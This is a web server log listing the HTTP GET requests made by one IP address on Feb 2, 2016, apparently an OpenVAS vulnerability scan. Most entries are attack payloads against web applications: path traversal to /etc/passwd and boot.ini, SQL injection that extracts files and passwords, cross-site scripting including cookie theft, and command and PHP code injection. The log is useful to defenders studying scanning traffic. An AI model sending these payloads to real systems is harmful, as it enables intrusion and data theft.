List of web attacks b 161.202.76.38 on Feb 2, 2016
 GET 
 GET ././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././../../../../../../../../
 GET /
 GET / 
 GET /  
 GET /#welcome
 GET /%00
 GET /%2bCSCOE%2b/win.js
 GET /%2e%2e%5c%2e%2e%5c%2e%2e%5cboot.ini
 GET /%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/etc/passwd
 GET /%5C%5C..%2f..%2f..%2f..%2fboot.ini%%20../
 GET /%80../%80../%80../%80../%80../%80../%80../%80../boot.ini
 GET /%NETHOOD%/
 GET /..%5c..%5c..%5cboot.ini
 GET /.../.../.../.../.../.../.../.../.../.../boot.ini
 GET /../../../../../../../../etc/passwd
 GET /..\..\..\..\..\..\..\..\..\..\boot.ini
 GET /..\..\..\..\..\..\..\..\winnt\win.ini
 GET /..\pixfir~1\how_to_login.html
 GET /././..
 GET /.DS_Store
 GET /.FBCIndex
 GET //
 GET //%3f.jsp
 GET /////..%2f..%2f..%2f..%2fboot.ini
 GET //404.php?url=1%3Cscript%3Ealert(%27openvas-xss-test%27)%3C/script%3E
 GET //?lang=../../../../../../../../../etc/passwd%00.png&p_id=60
 GET //?p=
 GET //?upload_to=
 GET //AccountSections.php/%22%3E%3Cscript%3Ealert(/openvas-xss-test/);%3C/script%3E
 GET //ApplicationEngine//
 GET //Config/diff.php?file=;id&new=1&old=2
 GET //FormMail.pl
 GET //IBSng/util/show_multistr.php?str=%3Cscript%3Ealert(/ovas-xss-test/)%3C/script%3E
 GET //LightNEasy.php?do=login
 GET //Login.php
 GET //Login/HostLogIn.asp?ie=0
 GET //Mondo/lang/sys/login.aspx
 GET //README.txt
 GET //UI/Login.jsp
 GET //User-Edit.asp?UID=1%20OR%201=1
 GET //_conf/?action=delsettings&group=..%252F..%252F..%252F..%252F..%252F..%252F..%252F..%252F..%252F..%252Fetc/passwd%2500.jpg&picdir=Sample_Gallery&what=descriptions
 GET //a_viewusers.php?s=1+UNION+SELECT+load_file(0x2f6574632f706173737764),null,null,null,null,null,null+limit+0
 GET //about
 GET //about-show.do
 GET //add.php?lang=../../../../../../../../../etc/passwd%00
 GET //admin/
 GET //admin/aindex.htm
 GET //admin/index.php
 GET //admin/index.php?page=unexisting../../../../../../../../../../../../../../../../../../etc/passwd%00
 GET //admin/lib/gradient/gradient.php?tam=..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2fetc/passwd%00
 GET //admin/login.jsp
 GET //admin/password_check_token.php?f_email=1&token=%22%3E%3Cscript%3Ealert%28/openvas-xss-test/%29;%3C/script%3E
 GET //admin/system
 GET //admin/updatelist.php?filepath=../includes/settings.php
 GET //afdrukken.php?page=%22%3E%3Cscript%3Ealert(%27openvas-xss-test%27)%3C/script%3E
 GET //animation.php?board=b&id=1">
 GET //application/configs/application.ini
 GET //applicationengine/
 GET //assets/plugins/mp3_id/mp3_id.php?GLOBALS[BASE]=../../../../../../../../../../../../../boot.ini%00
 GET //assets/plugins/mp3_id/mp3_id.php?GLOBALS[BASE]=../../../../../../../../../../../../../etc/passwd%00
 GET //backend/plugin/Registration/index.php?confirm=%3Cscript%3Ealert(%27openvas-xss-test%27)%3C/script%3E 
 GET //beerxml.php?r=null%20union%20select%201,2,3,4,5,0x4f70656e5641532d53514c2d496e6a656374696f6e2d54657374,7,8,9,10,11
 GET //bin/view/TWiki/WebHome
 GET //blob.php
 GET //blogs.php?tag=gamecat+
 GET //cart.php?a=test&templatefile=../../../../../../../../../etc/passwd%00
 GET //charts.php?language=../../../../../../../../../etc/passwd%00A
 GET //charts/wizard/url.php?${phpinfo()}=1
 GET //city.php?hotel_city=%22%3E%3Cscript%3Ealert(/openvas-xss-test/)%3C/script%3E
 GET //classifieds/Site_Admin/admin.php 
 GET //cms/index.php?q=%3Cscript%3Ealert(0x4f70656e5641532d53514c2d496e6a656374696f6e2d54657374)%3C/script%3E
 GET //comment.php?blog=../../../../../../../../../etc/passwd%00
 GET //complete-modules/modules/forcedownload/force_download.php?filename=/etc/passwd
 GET //config.xml.sav
 GET //content/dynpage_load.php?file=/boot.ini
 GET //content/dynpage_load.php?file=/etc/passwd
 GET //core/includes/gfw_smarty.php?config[gfwroot]=../../../../../../../../../boot.ini%00
 GET //core/includes/gfw_smarty.php?config[gfwroot]=../../../../../../../../../etc/passwd%00
 GET //cultbooking.php?lang=../../../../../../../../../etc/passwd%00
 GET //default.aspx
 GET //details_view.php?event_id=1&date=2000-12-01&view=month&loc=loc1&page_info_message=
 GET //display.php?filename=
 GET //do/view/TWiki/WebHome
 GET //docs/CHANGELOG
 GET //docs/distribution/tour_page1.htm
 GET //down.php?filename=../../../../../../../../../../../../etc/passwd%00
 GET //download.php?id=-1+union+select+1,0x4f70656e5641532d53514c2d496e6a656374696f6e2d54657374
 GET //download.php?id=2+AND+1=2+UNION+SELECT+1,2,3,4,0x4f70656e5641532d53514c2d496e6a656374696f6e2d54657374--
 GET //download_file.php?path=../../../../../../../../../../../../../../../../../../etc/passwd%00
 GET //downloadfile.php?dwnfile=../../../../../../../../../../../../../../../etc/passwd
 GET //downlot.php?file=../../../../../../../../../../../../../../../../../../../../../../../../../../../etc/passwd
 GET //extra/image.php?f=../../../../../../../../../etc/passwd
 GET //findagent.php?country1=%3Cscript%3Ealert(/openvas-xss-test/)%3C/script%3E
 GET //formmail.pl
 GET //forum_answer.php?que_id=-1/**/UNION/**/ALL/**/SELECT/**/1,2,3,4,0x4f70656e5641532d53514c2d496e6a656374696f6e2d54657374,6,7,8,9,10/**/FROM/**/expert/*
 GET //fr_left.php
 GET //frontend/js.php?module=../../../../../../../../../../../../../../../../../../etc/passwd%00&file=frontend.js&language=en
 GET //gallery.php?repertoire=../../../../../../../../../etc/passwd%00
 GET //gen/obj/collectivite.class.php?path_om=/boot.ini%00
 GET //gen/obj/collectivite.class.php?path_om=/etc/passwd%00
 GET //guestbook.php
 GET //gzip_loader.php?file=../../../../../../../../../../../../../../../../etc/passwd
 GET //handlers/getpage.php?id=9999999+UNION+SELECT+1,0x4f70656e5641532d53514c2d496e6a656374696f6e2d54657374,3,4,5,6,7+FROM+user+LIMIT+1
 GET //home.asp
 GET //home.php
 GET //htdocs/index.php
 GET //html/index.php
 GET //includes/esqueletos/skel_null.php?ABTPV_BLOQUE_CENTRAL=/etc/passwd
 GET //includes/include.php?cct_base=../../../../../../../../../boot.ini%00
 GET //includes/include.php?cct_base=../../../../../../../../../etc/passwd%00
 GET //includes/initsystem.php?loader_file=../../../../../../../../../etc/passwd%00
 GET //includes/tiny_mce/plugins/filemanager/classes/FileManager/FileSystems/ZipFileImpl.php?basepath=/etc/passwd%00
 GET //includes/tiny_mce/plugins/imagemanager/config.php?basepath=/etc/passwd%00
 GET //includes/window_top.php?theme_file=../../../../../../../../../etc/passwd%00
 GET //index.asp
 GET //index.html
 GET //index.php
 GET //index.php 
 GET //index.php/">
 GET //index.php/teachers.html?"/>
 GET //index.php?../../../../../../../boot.ini
 GET //index.php?../../../../../../../etc/passwd
 GET //index.php??p=../../../../../../../../../etc/passwd%00
 GET //index.php?GLOBALS[SKIN]=../../../../../../../../../etc/passwd%00
 GET //index.php?OPT_Session= OpenVAS_Req
 GET //index.php?PathPrefix=../../../../../../../../../../../../../../../../../../etc/passwd%00
 GET //index.php?a=19&c=
 GET //index.php?action=template&template=../../../../../../../../../../../../../../../../../../etc/passwd
 GET //index.php?fct=preview&p=../../../../../../../../../../../../../../../../../../etc/passwd%00
 GET //index.php?from=";>&help=true&page=What_is_wiki
 GET //index.php?id=-1'%20UNION%20SELECT%201,2,3,0x4f70656e5641532d53514c2d496e6a656374696f6e2d54657374,5,6,7,8,9,10,11,12,13--+
 GET //index.php?lng=../../../../../../../../../etc/passwd%00
 GET //index.php?load=elite&view=1%3C/title%3E%3Cscript%3Ealert(%27openvas-xss-test%27)%3C/script%3E
 GET //index.php?option=com_search&searchword=xss&ordering=%22%20onmouseover=alert(document.cookie)%20style=position:fixed;top:0;left:0;width:100%;height:100%;%22
 GET //index.php?p=../../../../../../../../../..//etc/passwd%00
 GET //index.php?p=../../../../../../../../../../boot.ini%00
 GET //index.php?page=../../../../../../../../../../../../../../../../boot.ini%00
 GET //index.php?page=../../../../../../../../../../../../../../../../etc/passwd%00
 GET //index.php?page=../../../../../../../../../etc/passwd
 GET //index.php?page=../../../../../../../../../etc/passwd%00
 GET //index.php?page=/etc/passwd
 GET //index.php?page=1&c=&searchCart=">
 GET //index.php?page=profile&id=%27%20or%20%27a%27=%27a
 GET //index.php?page=viewbus&bus='
 GET //index.php?pg=1&d=../../../../../../../../../../../../../../../../../../
 GET //index.php?system=../../../../../../../../../etc/passwd%00
 GET //index.php?theme=../../../../../../../../../etc/passwd%00
 GET //index.php?typefilter=..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2fboot.ini%00
 GET //index.php?typefilter=..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2fetc/passwd%00
 GET //index.phtml
 GET //innoedit.cgi?download=;id|
 GET //install.php?dl=/../../../../../../../../../../../../../../etc/passwd
 GET //jobs.php?lang=../../../../../../../../../etc/passwd%00
 GET //koha/help.pl?url=koha/../../../../../../../../../../../../../../../../../../../../../../../../../../../etc/passwd%00.pl
 GET //kommentar.php?filecat=">&fileid=0
 GET //language/en/text.php/
 GET //left.php
 GET //lib/browsefiles.php?dir=/etc
 GET //lib/browsefolders.php?dir=/etc
 GET //library/PHPExcel/PHPExcel/Shared/JAMA/docs/download.php/%27%3E%3Cscript%3Ealert(/openvas-xss-test/);%3C/script%3E
 GET //library/lib.menu.php?rootpath=../../../../../../../../../../../../../../../boot.ini%00
 GET //library/lib.menu.php?rootpath=../../../../../../../../../../../../../../../etc/passwd%00
 GET //libs/smarty_ajax/index.php?_=&f=update_intro&page=../../../../../../../../../../../../../../../../../../etc/passwd%00
 GET //loader-wizard.php?page=phpinfo
 GET //login
 GET //login.cgi
 GET //login.php
 GET //login.php?login=
 GET //login.pl
 GET //login.wdm.
 GET //login/login.php?sessID=
 GET //main.php
 GET //manager/index.php
 GET //medialist.php
 GET //message.php?skin=">
 GET //mod.php?mod=publisher&op=allmedia&artid=-1%20union%20select%200x4f70656e5641532d53514c2d496e6a656374696f6e2d54657374
 GET //module.php?mod=
 GET //module/forum/main.php?website=../../../../../../../../../etc/passwd%00
 GET //modules.php?name=gallery&files=foobar
 GET //modules/profile/user.php?aXconf[default_language]=../../../../../../../../../../../../../../../../../../etc/passwd%00
 GET //news.php4?nid=-12'+union+select+1,2,0x4f70656e5641532d53514c2d496e6a656374696f6e2d54657374,4,5,6,7,8,9,10,11/*
 GET //news.php?wgo=666+and+1=2+union+all+select+0,1,0x4f70656e5641532d53514c2d496e6a656374696f6e2d54657374,3,4,5,6,7,8--
 GET //nowosci.php?a=1&str=%3Cscript%3Ealert(/openvas-xss-test/)%3C/script%3E
 GET //oldnews_reader.php?lang=../../../../../../../../../../../../../../../boot.ini%00 
 GET //oldnews_reader.php?lang=../../../../../../../../../../../../../../../etc/passwd%00 
 GET //openBrowser.php?url="onload="alert(/openvas-xss-test/)
 GET //page.php?id='
 GET //page.php?page=../../../../../../../../../etc/passwd%00
 GET //photo.php?id=-9999/**/union/**/select/**/1,2,0x4f70656e5641532d53514c2d496e6a656374696f6e2d54657374--
 GET //photo/templates/admin_default/confirm.tpl.php?nsextt=">
 GET //pivot/index.php
 GET //pivotx/modules/module_image.php?image=
 GET //plugin/themes/default/page_forgot.php?apps_path[themes]=/etc/passwd%00
 GET //pmwiki.php?n=PmWiki.ReleaseNotes
 GET //portal/login.php?message=XSS%20Catched%20!%22))%3C/script%3E%3Cscript%3Ealert(/openvas-xss-test/)%3C/script%3E
 GET //post.php?newsgroups=
 GET //print.php?page=../../../../../../../../../etc/passwd
 GET //prodpage.cfm?CFID=&CFTOKEN=&CategoryID='openvas
 GET //productionnu2/fileuploader.php?dir=../../../../../../../../../../../boot.ini%00
 GET //productionnu2/fileuploader.php?dir=../../../../../../../../../../../etc/passwd%00
 GET //productionnu2/report.php?StartingDirectory=../../../../../../../../../../../boot.ini%00
 GET //productionnu2/report.php?StartingDirectory=../../../../../../../../../../../etc/passwd%00
 GET //report.php?img_id=%22%3E%3Cscript%3Ealert(/openvas-xss-test/)%3C/script%3E
 GET //research_display.php?ID=-null+UNiON+ALL+SELECT+null,null,null,0x4f70656e5641532d53514c2d496e6a656374696f6e2d54657374,null,null,null
 GET //ress.php?page=../../../../../../../../../etc/passwd%00
 GET //revert.php?rev=%3Cscript%3Ealert(%27OpenVAS-XSS-Test%27)%3C/script%3E
 GET //scr/soustab.php?dsn[phptype]=../../../../../../../../../../../boot.ini%00
 GET //scr/soustab.php?dsn[phptype]=../../../../../../../../../../../etc/passwd%00
 GET //scripts/adminSection/main.asp
 GET //search.php3?bn=%3Cbody%20onload=alert(%27openvas-xss-test%27)%3E
 GET //search.php?bn=%3Cbody%20onload=alert(%27openvas-xss-test%27)%3E
 GET //search.php?q=
 GET //search.php?s=%3Cscript%3Ealert(%27openvas-xss-test%27)%3C/script%3E
 GET //search.php?seed=1%27
 GET //search.php?words=%25%27/%2A%2A/UNION/%2A%2A/SELECT/%2A%2A/1%2CCONCAT%28%27%3C1%3E%27%2Cname%2C%27%3A%27%2Cpassword%2C%27%3C2%3E%27%29%2C3%2C4%2C5%2C6%2C7%2C8%2C9%2C10/%2A%2A/FROM/%2A%2A/site_administrators/%2A%2A/%23
 GET //searchresults.php?SearchTerm=">&where=ItemName&ord1=ItemName&ord2=asc&search1.x=50&search1.y=14
 GET //show_profile.php?custid=1+and+1=0+union+select+1,0x4f70656e5641532d53514c2d496e6a656374696f6e2d54657374,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30,31,32,33,34,35,36,37,38,39,40,41,42,43,44, 
 GET //signin.php
 GET //site/login.php
 GET //sitemap.php?id_site=
 GET //smarty.php?cwd=../../../../../../../../../etc/passwd%00
 GET //spip.php
 GET //ssi//%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/etc/passwd
 GET //star57.cgi?download=;id|
 GET //status.php
 GET //sublink.php?langval=/etc/passwd
 GET //system/admin/modules.php?install=../../../../../../../../../etc/passwd%00
 GET //team.rc5-72.php?showlang=../../../../../../../../../etc/passwd%00
 GET //test/files.xml?action=download&file=/../../wikka.config.php
 GET //themes/admin/default/modules/show.php?file=/boot.ini
 GET //themes/admin/default/modules/show.php?file=/etc/passwd
 GET //themes/default/header.inc.php?theme_dir=%22%3E%3Cscript%3Ealert%28/openvas-xss-test/%29;%3C/script%3E
 GET //ticketview.php?email=%22%3E%3Cscript%3Ealert(/openvas-xss-test/)%3C/script%3E&id=1
 GET //tiki-index.php
 GET //tiny_mce/plugins/ibrowser/ibrowser.php?lang=../../../../../../../../../../../../../boot.ini%00
 GET //tiny_mce/plugins/ibrowser/ibrowser.php?lang=../../../../../../../../../../../../../etc/passwd%00
 GET //title.html
 GET //titleBar.php
 GET //upload/account-login.php
 GET //upload/index.php
 GET //users/login.php
 GET //usr/extensions/get_tree.inc.php?GLOBALS[root_path]=/etc/passwd%00
 GET //utility/TagSelector.aspx?TagEditor=%27)%3C/script%3E%3Cscript%3Ealert(%27openvas-xss-test%27)%3C/script%3E
 GET //vhosts/ehcp/?op=applyforaccount
 GET //viewfaqs.php?cat=-1+union+select+1
 GET //viewstory.php?id=-8+and+1=1+union+select+0,1,2,0x4f70656e5641532d53514c2d496e6a656374696f6e2d54657374,4
 GET //wa.exe?SHOWTPL=
 GET //web/?wicket:bookmarkablePage=:org.geoserver.web.AboutGeoServerPage
 GET //web/help.php
 GET //webacc?User.interface=/../webacc/wml
 GET //webapp/home.html?0
 GET //welcome.do
 GET //wiki/index.php
 GET //windows/function.php?file=/etc/passwd&start=0&end=10
 GET //wizard/index.php?type=';phpinfo();//
 GET //wrx.cgi
 GET //www/index.php
 GET //www/loader.php/system/">
 GET //xml/get_list.php?dataType=ApplyChanges&iNumb=1&iIDcat=%27
 GET //zp-core/admin.php?a="><script>alert(/openvas-xss-test/)</script>
 GET /11in1/index.php
 GET /2532Gigs/index.php
 GET /312431151openvas.aspx
 GET /4images/index.php
 GET /68k/themes/admin/default/modules/show.php?file=/boot.ini
 GET /68k/themes/admin/default/modules/show.php?file=/etc/passwd
 GET /8qZ2HS8L.html
 GET /935529712.aspx
 GET /99articles/index.php?page=/etc/passwd%00
 GET /
 GET /?M=A
 GET /?Mode=debug
 GET /AChecker/checker/index.php
 GET /AContent/home/index.php
 GET /AMSI/download.php?file=etc/passwd
 GET /ANT/news/admin/index.php
 GET /ATutor/login.php
 GET /Admin/login/default.asp
 GET /Album/?mode=album&album=..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fetc&dispsize=640&start=0
 GET /Allegro
 GET /Ampache/login.php
 GET /Ant/Lisez%20moi.txt
 GET /Ant/Readme.txt
 GET /Ant/news/admin/index.php
 GET /ArticleSetup/upload/index.php
 GET /Burden/login.php
 GET /CFIDE/administrator/index.cfm
 GET /ClearBudget/db/budget.sqlite
 GET /ConsoleHelp/default.jsp
 GET /Copyscape/
 GET /CultBooking/cultbooking.php?lang=../../../../../../../../../etc/passwd%00
 GET /DB4Web/CV-33:23/foo
 GET /DEM0/res?res/igres.dll/sys_about.html
 GET /DMC/titleBar.php
 GET /DPI11F/index.php
 GET /DVR.cfg
 GET /DesktopModules/AuthenticationServices/OpenID/license.txt
 GET /DigitalScribe/index.php
 GET /DigitalScribe/login.php
 GET /DigitalScribe/stuworkdisplay.php?ID=-1)%20UNION%20ALL%20SELECT%200x4f70656e5641532d53514c2d496e6a656374696f6e2d54657374,2,3,4,5,6,7,8,9,10,11%23
 GET /DotNetNuke Website/default.aspx
 GET /DotNetNuke/Install/InstallWizard.aspx
 GET /DotNetNuke/default.aspx
 GET /Dotproject/index.php
 GET /Dwins/general/login.php
 GET /EmployeeSearch.cc
 GET /EsContacts/login.php?msg=
 GET /ExoPHPDesk/index.php
 GET /F3Site/SYSTEM/index.php
 GET /FlashChat/index.php
 GET /FreeDirectory/index.php
 GET /GDL/index.php
 GET /GW5/GWWEB.EXE?GET-CONTEXT&HTMLVER=AAA
 GET /GW5/GWWEB.EXE?HELP=bad-request
 GET /GetSimple/index.php
 GET /HNAP1
 GET /HomePage
 GET /Info.live.htm
 GET /IntraMaps/ApplicationEngine//
 GET /IntraMaps/applicationengine/
 GET /IntraMaps70/ApplicationEngine//
 GET /IntraMaps70/applicationengine/
 GET /JAG/guestbook.php
 GET /JaxCMS/index.php
 GET /LabWiki/index.php
 GET /LabWiki/index.php?from=";>&help=true&page=What_is_wiki
 GET /LiveZilla/index.php
 GET /Login.aspx
 GET /LoginPage.do
 GET /MSWSMTP/Common/Authentication/Logon.aspx
 GET /Main/WebHome
 GET /MegaFileManager/index.php
 GET /Mercury/login.php
 GET /NCMContainer.cc
 GET /NoticeBoardPro/index.php
 GET /OPT127MAX/opt/index.php?OPT_Session= OpenVAS_Req
 GET /OpenVASTest51008643.html
 GET /PBBoard/index.php
 GET /PHPBazar/index.php
 GET /PithCMS/oldnews_reader.php?lang=../../../../../../../../../../../../../../../boot.ini%00 
 GET /PithCMS/oldnews_reader.php?lang=../../../../../../../../../../../../../../../etc/passwd%00 
 GET /PostNuke/docs/CHANGELOG
 GET /PostNuke/docs/distribution/tour_page1.htm
 GET /PostNuke/themes/SeaBreeze/style/style.css
 GET /Presenter/index.fsp?signout=true
 GET /RabbitWiki/index.php
 GET /SPF/shop.cgi
 GET /SStc/index.html
 GET /Samsara/modules/news/index.php
 GET /SecureDocumentLibrary/inc_securedocumentlibrary.asp
 GET /ShoreWareDirector//
 GET /ShowCenter/SettingsBase.php?Skin=
 GET /SilverStream
 GET /SilverStream/Meta/Tables/?access-mode=text
 GET /SimpleID/www/index.php
 GET /Site/Pages/login.aspx
 GET /SiteScope/
 GET /SiteScope/cgi/go.exe/SiteScope?page=eventLog&machine=&logName=System&account=administrator
 GET /SiteScope/htdocs/SiteScope.html
 GET /SiteScope/index.html
 GET /Sitemagic/index.php
 GET /Spheric/admin/index.php
 GET /Subscribe/index.php
 GET /SystemInfo
 GET /TimeLive/default.aspx
 GET /TimeTracking/default.aspx
 GET /TomatoCart/index.php
 GET /TrackItWeb/Account/LogIn
 GET /Tribisur/scripts.php
 GET /Upload/index.php
 GET /UseBB/index.php
 GET /Vanilla113rc1/index.php
 GET /Vanilla117/index.php
 GET /Vanilla118/index.php
 GET /WANem/title.html
 GET /WEB-INF./web.xml
 GET /WackoWiki
 GET /WeBid/index.php
 GET /WebID/IISWebAgentIF.dll?postdata=">
 GET /Xdataface/dataface_info.php
 GET /ZenTimeTracking/index.php
 GET /Zeuscart/index.php
 GET /_notes/
 GET /a.jsp/
 GET /abantecart/index.php
 GET /about/viewheadline.php?id=-9%27%20union%20select%201,2,3,4,5,0x4f70656e5641532d53514c2d496e6a656374696f6e2d54657374,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23%20from%20wp_users--+
 GET /abtpportal/includes/esqueletos/skel_null.php?ABTPV_BLOQUE_CENTRAL=/etc/passwd
 GET /account/index.php
 GET /account/index.php 
 GET /account/login
 GET /accounting/control/main
 GET /accounts/login/
 GET /acute-cp/
 GET /adaptbb/index.php
 GET /adaptcms/inc/smarty/libs/init.php?sitepath=../../../../../../../../../etc/passwd%00
 GET /adaptcms/sitemap.xml
 GET /adesk/login.cgi
 GET /admanagerpro/index.php
 GET /admidio/adm_program/index.php
 GET /admin
 GET /admin.cgi/sd.css
 GET /admin.php
 GET /admin/
 GET /admin/admin.php
 GET /admin/helpfiles/AdminHelp.php
 GET /admin/index.html
 GET /admin/index.php
 GET /admin/login.php
 GET /admin/moderation.php
 GET /admin/public/index.html
 GET /admin/welcome.php
 GET /admin_area/login.php
 GET /admin_login.html
 GET /adminpasswd.cgi
 GET /ads/admin.php
 GET /ads/www/admin/index.php
 GET /adserver/www/admin/index.php
 GET /aeromail/index.php
 GET /aflog/Readme.txt
 GET /ag/index.php
 GET /agc/vicidial.php
 GET /aihs/index.php
 GET /aihspro/index.php
 GET /ajaxportal/index.php
 GET /alcasar/index.php
 GET /amazon/search.php?query=1&mode=all
 GET /amserver/UI/Login.jsp
 GET /amsi/download.php?file=etc/passwd
 GET /andromeda.php
 GET /andromeda/andromeda.php
 GET /ans.pl?p=../../../../../usr/bin/id|&blah
 GET /ant/Lisez%20moi.txt
 GET /ant/Readme.txt
 GET /ant/news/admin/index.php
 GET /apachesolr/admin/
 GET /aphpkb/a_viewusers.php?s=1+UNION+SELECT+load_file(0x2f6574632f706173737764),null,null,null,null,null,null+limit+0
 GET /aphpkb/index.php
 GET /app/login.php
 GET /app?operation=about
 GET /appRain/index.php
 GET /appRain/profile/index.php
 GET /application/login/login.html
 GET /apprain/admin/system
 GET /apprain/profile/index.php
 GET /apps/a3/cfg_ethping.cgi
 GET /aproxengine/engine/inc/version.info
 GET /archiva/index.action
 GET /ariadne/www/loader.php/system/">
 GET /arsc/base/index.php
 GET /artifactory/webapp/home.html?0
 GET /asaancart/libs/smarty_ajax/index.php?_=&f=update_intro&page=../../../../../../../../../../../../../../../../../../etc/passwd%00
 GET /ask/forum_answer.php?que_id=-1/**/UNION/**/ALL/**/SELECT/**/1,2,3,4,0x4f70656e5641532d53514c2d496e6a656374696f6e2d54657374,6,7,8,9,10/**/FROM/**/expert/*
 GET /astrospaces/index.php
 GET /atsphp/index.php
 GET /auction/viewfaqs.php?cat=-1+union+select+1
 GET /audistat/index.php
 GET /avarcade/index.php
 GET /awcm/includes/window_top.php?theme_file=../../../../../../../../../etc/passwd%00
 GET /awcm/index.php
 GET /awcuser/cgi-bin/vcs?xsl=/vcs/vcs_home.xsl%26id%26
 GET /awiki/index.php?page=/etc/passwd
 GET /awstats/awstats.pl?config=OpenVAS-Test
 GET /awstats/awstats.pl?filterrawlog=&rawlog_maxlines=5000&config=132.235.1.7&framename=main&pluginmode=rawlog&logfile=/etc/passwd
 GET /awstats/awstats.pl?framename=mainright
 GET /awstats/wwwroot/cgi-bin/awstats.pl
 GET /awstatstotals/awstatstotals.php
 GET /axdcms/modules/profile/user.php?aXconf[default_language]=../../../../../../../../../../../../../../../../../../etc/passwd%00
 GET /axis/admin/index.php
 GET /axis2/services/Version/getVersion
 GET /b2epms/index.php
 GET /backend/start/index.php
 GET /backup/down.php?filename=../../../../../../../../../../../../etc/passwd%00
 GET /backuppc/index.cgi
 GET /baconmap/admin/updatelist.php?filepath=../includes/settings.php
 GET /base/base_main.php
 GET /basilic/Config/diff.php?file=;id&new=1&old=2
 GET /basilix/basilix.php
 GET /batavi/admin/index.php?login
 GET /bb_admin.php
 GET /bbs/_head.php?_zb_path=../../../../../../../../../../etc/passwd%00
 GET /bbs/check_user_id.php?user_id=
 GET /bbs/zboard.php?id=gallery&sn1=ALBANIAN%20RULEZ='%3E%3Cscript%3Efoo%3C/script%3E
 GET /beta/index.html
 GET /betsy/ress.php?page=../../../../../../../../../etc/passwd%00
 GET /bigforum/index.php
 GET /bin/view/foswiki/WebHome
 GET /bitweaver/users/login.php
 GET /bitweaver/wiki/index.php
 GET /blob/blob.php
 GET /blog/
 GET /blog/blob.php
 GET /blog/blogAdmin/jobs.php?j=login&p=1%27or%271&%27=1
 GET /blog/blogengine/
 GET /blog/blogs.php?tag=gamecat+
 GET /blog/comment.php?id=-1%27%20UNION%20ALL%20SELECT%20NULL,0x4f70656e5641532d53514c2d496e6a656374696f6e2d54657374,3,4%20FROM%20cblog_users%23
 GET /blog/comments.php?image_id=1'
 GET /blog/index.php
 GET /blog/index.php/Special/Main/Templates?cmd=copy&which=%3Cscript%3Ealert(%27openvas-xss-test%27)%3C/script%3E
 GET /blog/index.php?page=/etc/passwd%00
 GET /blog/login.php
 GET /blog/photo/templates/admin_default/confirm.tpl.php?nsextt=">
 GET /blog/pivotx/modules/module_image.php?image=
 GET /blog/public/view.php?storyid=-1%27%20UNION%20ALL%20SELECT%201,2,132323231,4,5,6,7,8,9,10%23
 GET /blog/search.php?q=
 GET /blog/search.php?words=%25%27/%2A%2A/UNION/%2A%2A/SELECT/%2A%2A/1%2CCONCAT%28%27%3C1%3E%27%2Cname%2C%27%3A%27%2Cpassword%2C%27%3C2%3E%27%29%2C3%2C4%2C5%2C6%2C7%2C8%2C9%2C10/%2A%2A/FROM/%2A%2A/site_administrators/%2A%2A/%23 HT 
 GET /blogengine/
 GET /bloggeruniverse/index.php
 GET /bluadmin/get_flash_info.php?ver=1'
 GET /board/index.php
 GET /board/index.php?page=profile&id=%27%20or%20%27a%27=%27a
 GET /boat-webdesign/detail.asp?ID=999999 union select1,2,3,4,5,username,password,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30,31,32,33,34,35,36,37,38,39,40,41,42,43,44,45,46,47,48,49,50,51,52,53,54,55,56,57, 
 GET /booking_calendar//details_view.php?event_id=1&date=2000-12-01&view=month&loc=loc1&page_info_message=
 GET /brainkeeper/index.php
 GET /brewthology/beerxml.php?r=null%20union%20select%201,2,3,4,5,0x4f70656e5641532d53514c2d496e6a656374696f6e2d54657374,7,8,9,10,11
 GET /brightmail/index.jsp
 GET /brightmail/viewLogin.do
 GET /broadWeb/bwRoot.asp
 GET /browser/index.php
 GET /browserCRM/index.php
 GET /browsercrm/index.php
 GET /bst/nowosci.php?a=1&str=%3Cscript%3Ealert(/openvas-xss-test/)%3C/script%3E
 GET /btnet/about.html
 GET /btnet/default.aspx
 GET /bugport/php/index.php
 GET /bugs//bug.php?op=vote&bugid=1'
 GET /bugtrackernet/default.aspx
 GET /bugzilla/index.cgi
 GET /buildbot/about
 GET /burden/login.php
 GET /bw/users/login.php
 GET /bw/wiki/index.php
 GET /cPcreator/index.php
 GET /cacti/index.php
 GET /cal/details_view.php?event_id=1&date=2000-12-01&view=month&loc=loc1&page_info_message=
 GET /calendar/admin/index.php?eventid=-1+union+all+select+1,concat_ws(version(),0x3a,database(),0x3a,user()),3,4,5,6--
 GET /calendar/details.asp?Event_ID='
 GET /calendar/index.php
 GET /calendarexpress/search.php?allwords=
&cid=0&title=1&desc=1
 GET /calendarix/calendar.php
 GET /campsite//index.php
 GET /campsite/admin/login.php
 GET /campsite1/implementation/site//index.php
 GET /campsite1/implementation/site/admin/login.php
 GET /car_portal/index.php
 GET /cart/admin.php?_g=login&goto=%2Fcubecart%2Fadmin.php
 GET /cart/cart.php?a=test&templatefile=../../../../../../../../../etc/passwd%00
 GET /cart/includes/initsystem.php?loader_file=../../../../../../../../../etc/passwd%00
 GET /cart/index.php
 GET /cart/index.php?typefilter=..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2fboot.ini%00
 GET /cart/index.php?typefilter=..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2fetc/passwd%00
 GET /cartScripts/admin/helpfiles/AdminHelp.php
 GET /cartweaver/admin/helpfiles/AdminHelp.php
 GET /catalog/index.php
 GET /caucho-status
 GET /cb/cultbooking.php?lang=../../../../../../../../../etc/passwd%00
 GET /cbdm/cart/index.php?page=1&c=&searchCart=">
 GET /ccms/afdrukken.php?page=%22%3E%3Cscript%3Ealert(%27openvas-xss-test%27)%3C/script%3E
 GET /cctiddly/includes/include.php?cct_base=../../../../../../../../../boot.ini%00
 GET /cctiddly/includes/include.php?cct_base=../../../../../../../../../etc/passwd%00
